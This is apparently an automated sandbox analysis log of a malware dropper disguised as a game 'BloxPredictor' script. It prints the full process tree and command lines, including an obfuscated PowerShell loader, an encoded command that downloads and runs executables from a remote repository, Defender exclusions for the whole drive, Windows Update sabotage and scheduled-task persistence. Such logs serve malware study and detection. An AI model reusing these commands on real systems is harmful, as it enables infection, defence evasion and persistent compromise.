PID 2344 wrote to memory of 748	2344	LicenceChecker.exe	cmd.exe
PID 2344 wrote to memory of 5056	2344	LicenceChecker.exe	cmd.exe
PID 2344 wrote to memory of 5056	2344	LicenceChecker.exe	cmd.exe
PID 2344 wrote to memory of 4884	2344	LicenceChecker.exe	powershell.exe
PID 2344 wrote to memory of 4884	2344	LicenceChecker.exe	powershell.exe
PID 748 wrote to memory of 2568	748	cmd.exe	sc.exe
PID 748 wrote to memory of 2568	748	cmd.exe	sc.exe
PID 5056 wrote to memory of 316	5056	cmd.exe	powercfg.exe
PID 5056 wrote to memory of 316	5056	cmd.exe	powercfg.exe
PID 748 wrote to memory of 4716	748	cmd.exe	sc.exe
PID 748 wrote to memory of 4716	748	cmd.exe	sc.exe
PID 5056 wrote to memory of 1104	5056	cmd.exe	powercfg.exe
PID 5056 wrote to memory of 1104	5056	cmd.exe	powercfg.exe
PID 5056 wrote to memory of 1532	5056	cmd.exe	powercfg.exe
PID 5056 wrote to memory of 1532	5056	cmd.exe	powercfg.exe
PID 748 wrote to memory of 5044	748	cmd.exe	sc.exe
PID 748 wrote to memory of 5044	748	cmd.exe	sc.exe
PID 5056 wrote to memory of 3372	5056	cmd.exe	schtasks.exe
PID 5056 wrote to memory of 3372	5056	cmd.exe	schtasks.exe
PID 748 wrote to memory of 1504	748	cmd.exe	sc.exe
PID 748 wrote to memory of 1504	748	cmd.exe	sc.exe
PID 748 wrote to memory of 3784	748	cmd.exe	sc.exe
PID 748 wrote to memory of 3784	748	cmd.exe	sc.exe
PID 748 wrote to memory of 1056	748	cmd.exe	reg.exe
PID 748 wrote to memory of 1056	748	cmd.exe	reg.exe
PID 748 wrote to memory of 2856	748	cmd.exe	reg.exe
PID 748 wrote to memory of 2856	748	cmd.exe	reg.exe
PID 748 wrote to memory of 4140	748	cmd.exe	reg.exe
PID 748 wrote to memory of 4140	748	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2484 attrib.exe

pid	process
2484	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\system32\net.exe
net file
2⤵
- Suspicious use of WriteProcessMemory
PID:4932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
3⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe
"BloxPredictor.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utPpZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat').Split([Environment]::NewLine);foreach ($rwqec in $utPpZ) { if ($rwqec.StartsWith(':: ')) { $Wboiv = $rwqec.Substring(3); break; }; };$gxVLe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Wboiv);$GyhDr = New-Object System.Security.Cryptography.AesManaged;$GyhDr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GyhDr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GyhDr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YLrTLbeRJCsrE1rODFNA5EoKHyT/E5XO8ub+oldlmT0=');$GyhDr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WKvnZ2dZQdF2NCy0/rivZA==');$bYWQg = $GyhDr.CreateDecryptor();$gxVLe = $bYWQg.TransformFinalBlock($gxVLe, 0, $gxVLe.Length);$bYWQg.Dispose();$GyhDr.Dispose();$xJivi = New-Object System.IO.MemoryStream(, $gxVLe);$UhQFt = New-Object System.IO.MemoryStream;$RZDSG = New-Object System.IO.Compression.GZipStream($xJivi, [IO.Compression.CompressionMode]::Decompress);$RZDSG.CopyTo($UhQFt);$RZDSG.Dispose();$xJivi.Dispose();$UhQFt.Dispose();$gxVLe = $UhQFt.ToArray();$lwtWe = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($gxVLe);$erSXK = $lwtWe.EntryPoint;$erSXK.Invoke($null, (, [string[]] ('')))
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAaQBqACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHoAaQBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAGMAZQAhACAAQwBvAG4AdABhAGMAdAAgAG8AdwBuAGUAcgAgAG8AbgAgAFQAZQBsAGUAZwByAGEAbQA6ACAAQABNAGEAdgBlADEANABCAHIAdgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAaQB3AGsAIwA+ADsAIgA7ADwAIwB6AGEAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAZABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcABjACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AbAB1AGMAaQBmAGUAcgA1ADgAMQA4ADQALwBlAHcAagBuAGYAaQBvAHcAZQBuAGYAaQB3AGUAdwAvAHIAYQB3AC8AMwA5AGIAMgA2ADQANABlADUANAA3AGQAZQAwADkANQBiADgAYQBmADYAZQAxAGUAMgA1AGIANwBjAGQAOABjADAAZgAzADEANgA4AGIANgAvAGwAdQBjAGkAZgBlAHIALgBlAHgAZQAnACwAIAA8ACMAbQBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGsAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBwAHIAbwB0AGUAYwB0AGkAbwBuADEALgBlAHgAZQAnACkAKQA8ACMAcwB6AGsAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAZgBlAHIANQA4ADEAOAA0AC8AZQB3AGoAbgBmAGkAbwB3AGUAbgBmAGkAdwBlAHcALwByAGEAdwAvADMAOQBiADIANgA0ADQAZQA1ADQANwBkAGUAMAA5ADUAYgA4AGEAZgA2AGUAMQBlADIANQBiADcAYwBkADgAYwAwAGYAMwAxADYAOABiADYALwBsAHUAYwBpAG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGIAcgBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBnAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagB0AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAGMAZQBDAGgAZQBjAGsAZQByAC4AZQB4AGUAJwApACkAPAAjAGoAcQBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGYAZQByADUAOAAxADgANAAvAGUAdwBqAG4AZgBpAG8AdwBlAG4AZgBpAHcAZQB3AC8AcgBhAHcALwAzADkAYgAyADYANAA0AGUANQA0ADcAZABlADAAOQA1AGIAOABhAGYANgBlADEAZQAyADUAYgA3AGMAZAA4AGMAMABmADMAMQA2ADgAYgA2AC8AYgBsAG8AbwBkAGUAeQAuAGUAeABlACcALAAgADwAIwB4AGQAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGUAagBqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAcQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUATwB1AHQAcAB1AHQALgBlAHgAZQAnACkAKQA8ACMAZAB0AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABrAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAZgBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHAAcgBvAHQAZQBjAHQAaQBvAG4AMQAuAGUAeABlACcAKQA8ACMAcgBoAHUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBjAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAdgBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcAKQA8ACMAcQBsAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAeQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUATwB1AHQAcAB1AHQALgBlAHgAZQAnACkAPAAjAHcAaQBiACMAPgA="
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#zii#>[System.Windows.Forms.MessageBox]::Show('No licence! Contact owner on Telegram: @Mave14Brv','','OK','Error')<#iwk#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Users\Admin\AppData\Roaming\protection1.exe
"C:\Users\Admin\AppData\Roaming\protection1.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4188

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\containerServerWebMonitornet\qcbaWttH43WmPxKkpx5bHkWC.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\containerServerWebMonitornet\SHgR50yPdqOmq945QS.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4344

C:\containerServerWebMonitornet\ContainerServersvc.exe
"C:\containerServerWebMonitornet\ContainerServersvc.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
8⤵
PID:4328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerServerWebMonitornet/'
8⤵
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:2816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
8⤵
PID:3776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
8⤵
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
8⤵
PID:3884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
8⤵
PID:3552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
8⤵
PID:2484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
8⤵
PID:1132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
8⤵
PID:3568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
8⤵
PID:2672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
8⤵
PID:528

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
PID:1420

C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe
"C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe"
8⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2828

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4715ea5-2595-4f25-baa4-fbde5ef5b32f.vbs"
9⤵
PID:5948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1e6f1d79-70b5-4681-b0a6-95e8ab563ff7.vbs"
9⤵
PID:5920

C:\Users\Admin\AppData\Roaming\LicenceChecker.exe
"C:\Users\Admin\AppData\Roaming\LicenceChecker.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBqAHEAZQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAegBnACMAPgAgAEAAKAAgADwAIwBvAHUAbgAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAG8AdgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBxAGoAYgB2ACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:2568

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:4716

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:5044

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1504

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:3784

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1056

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:2856

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:4140

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:4780

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:3508

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4220

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3572

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2368

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2836

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:556

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:4684

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:3496

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:4628

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3372

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:3564

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:2076

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:1976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:1076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:3372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeABzAGYAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIAYwBoAHIALgBlAHgAZQAiACcAKQAgADwAIwBqAHAAZwBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAbABkAHcAbgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHgAcwBjACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUARwBOAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB4AHUAbgByACMAPgA7AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
5⤵
PID:3684

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
6⤵
PID:1420

C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe
"C:\Users\Admin\AppData\Local\Temp\LicenceOutput.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:5072

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:116

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe"
4⤵
- Views/modifies file attributes
PID:2484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3868

C:\Windows\system32\schtasks.exe
